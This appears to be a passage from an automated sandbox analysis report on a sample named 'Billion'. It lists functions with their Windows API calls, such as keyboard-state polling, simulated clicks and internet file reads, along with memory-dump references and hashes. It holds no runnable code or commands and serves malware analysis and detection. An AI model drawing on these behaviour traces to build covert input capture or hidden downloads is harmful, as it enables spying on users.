                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00190354,00000000,00000000,?,?,001A1A02,?,7644E610,?,00190354), ref: 0014FA18
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 851346f758e5ff699f36cdfeb0c6dfd881aafa316d03d7c4c5de2812c8f375a5
                                                                                                                                                                                                                                                                                                          • Instruction ID: c994675a593ca188fdc1306eb9743f08f65f75345a1da1105a0ae18d9e704707
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 851346f758e5ff699f36cdfeb0c6dfd881aafa316d03d7c4c5de2812c8f375a5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44515935604205DFCB00DF68C485DE9BBF0FF19318B1980A8E90AAB762D731ED86CB81
                                                                                                                                                                                                                                                                                                          Function 001C75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001C766B
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 001C7682
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001C76AB
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001AB5BE,00000000,00000000), ref: 001C76D0
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001C76FF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 24e8ee30682ba51518455de4ebf4ef2c71423c3e47925820abcab0cbe88244b1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 75425a5c11abb287fe9e313223ba28f2ba6d027842b268ad37dfe25becff6ce6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e8ee30682ba51518455de4ebf4ef2c71423c3e47925820abcab0cbe88244b1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541D635A08624AFE729CF2CDC48FA57B65EB15350F150268F815A73E0D7B0ED51DE50
                                                                                                                                                                                                                                                                                                          Function 001319CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 001319E1
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 001319FE
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00131A23
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00131A3D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a633afcb207467278885afec55c6b42d44ac946dbc222fe24ff8b8b7cbc65092
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9406e7d31aa9966ede4b69471c8d7be089696669026e3a0f6b46911b0475e0ff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a633afcb207467278885afec55c6b42d44ac946dbc222fe24ff8b8b7cbc65092
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A417171A0425AFFDF199F64C844BEEBB74FF15325F21821AE439A3290C7306A94DB51
                                                                                                                                                                                                                                                                                                          Function 0019224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00192262
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 0019230E
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00192316
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00192327
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0019232F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 755be65aacfd605ff60959d4cbf5891e6e0ff1e3f9d4906a244140f826a9de92
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8ce53de2923e2d0852d4e29eca578ae922d1aaa98fbb64b7841cec2fd5e7e0d2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755be65aacfd605ff60959d4cbf5891e6e0ff1e3f9d4906a244140f826a9de92
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA31BF71900219EFDF14CFA8DD89ADE3BB5EB04315F114229F925A72D0C770E944DB90
                                                                                                                                                                                                                                                                                                          Function 001AD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001ACC63,00000000), ref: 001AD97D
                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 001AD9B4
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,001ACC63,00000000), ref: 001AD9F9
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,001ACC63,00000000), ref: 001ADA0D
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,001ACC63,00000000), ref: 001ADA37
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 460b0a97d21d6d12a7f382fde7781c004f41d6c99560a631007a9e0f77284186
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76b74110b8667ba1371ca5b9353371858ee4eb41c057ff504fd4c8e0cbe88dc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 460b0a97d21d6d12a7f382fde7781c004f41d6c99560a631007a9e0f77284186
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69319A75500B05EFDB24DFA5E884EABBBF8EB15354B10442EE506D3950DB30EE409B60
                                                                                                                                                                                                                                                                                                          Function 001C61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001C61E4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 001C623C
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C624E
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C6259
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001C62B5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 007aee0249fbc5840bd756f6a47b19afa3c79a314dfb6fd79f1714a233f03578
                                                                                                                                                                                                                                                                                                          • Instruction ID: efffbf9872f827ab7c3c6ac431d64d33f47a850728253ee1ec2071c6b1b15a38
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007aee0249fbc5840bd756f6a47b19afa3c79a314dfb6fd79f1714a233f03578
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49219E759002189ADB209FA0DC84FEEBBB9FB64724F10421EF929EA181D770D985CF50
                                                                                                                                                                                                                                                                                                          Function 001B138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001B13AE
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001B13C5
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001B1401
                                                                                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 001B140D
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 001B1445
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2abf5f97085e9b2bb30abe688930a9e86eb79db7b35157fcd6dd861c982d67e2
                                                                                                                                                                                                                                                                                                          • Instruction ID: c0eae5dc889904584e20c3f49f7f4ba52c2f0571feb88e723989a6cbcbc4ca38
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2abf5f97085e9b2bb30abe688930a9e86eb79db7b35157fcd6dd861c982d67e2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71216A76600214AFD704EF69D899EAEBBE5EF59310B058439F85A97761DB30EC40CB90
                                                                                                                                                                                                                                                                                                          Function 0016D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0016D146
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0016D169
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00163B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0016D18F
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016D1A2
                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0016D1B1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c972e256b31fcfc841c0fc8d37cc5e0e611c6635980c28668e416db4433763c3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 216fc2677696eb9f2307f810c8277449ad3735e8784c00184544c35acb426688
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c972e256b31fcfc841c0fc8d37cc5e0e611c6635980c28668e416db4433763c3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD018476F016157F332166B67C8CD7B6EADEEC3BA13190129FD04C6244DBA08D1181B1
                                                                                                                                                                                                                                                                                                          Function 00196078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ae3c9800efbf1d62f4f00b3a264390705814f78cee76f69811790e168ae2a5c3
                                                                                                                                                                                                                                                                                                          • Instruction ID: d59e4f4023aec057a86b28ca41a6ab429658f05f0faf6b16a55dfdbcacf9a79c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae3c9800efbf1d62f4f00b3a264390705814f78cee76f69811790e168ae2a5c3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6401B1B6604305BBDA1656249CC2FAB735D9E68399F094022FD0A9E341E761ED14C6B1
                                                                                                                                                                                                                                                                                                          Function 0016316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,0015F64E,0015545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00163170
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001631A5
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001631CC
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 001631D9
                                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 001631E2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1dbaee793cdf0c6f4e5b1b1420ca1e61a59ab0dbf848dbf339d56527c19a6f2b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 787acb7ec81814452dbe12afa5868bbd4b4b64b7def5596731ef576728f48f2a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dbaee793cdf0c6f4e5b1b1420ca1e61a59ab0dbf848dbf339d56527c19a6f2b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601C8B2644A006BD6126774AC89E3B2A6DAFE37B17220434FC35D21D1EF75CA325161
                                                                                                                                                                                                                                                                                                          Function 001908FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?,?,00190C4E), ref: 0019091B
                                                                                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190936
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190944
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?), ref: 00190954
                                                                                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190960
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 27b7e7dc979dd542c0a063bb5a424e4a861d67f74deb6416ba2d749e9ba6a687
                                                                                                                                                                                                                                                                                                          • Instruction ID: b278e9e41760edbe7baa4698975486fbfadb6a9a657c81850fa191c1f5434192
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27b7e7dc979dd542c0a063bb5a424e4a861d67f74deb6416ba2d749e9ba6a687
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C018F72600204AFEB124F55EC44F9A7EADEB48759F140128FD09E2212D771DD80DBA0
                                                                                                                                                                                                                                                                                                          Function 0019F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0019F2AE
                                                                                                                                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0019F2BC
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0019F2C4
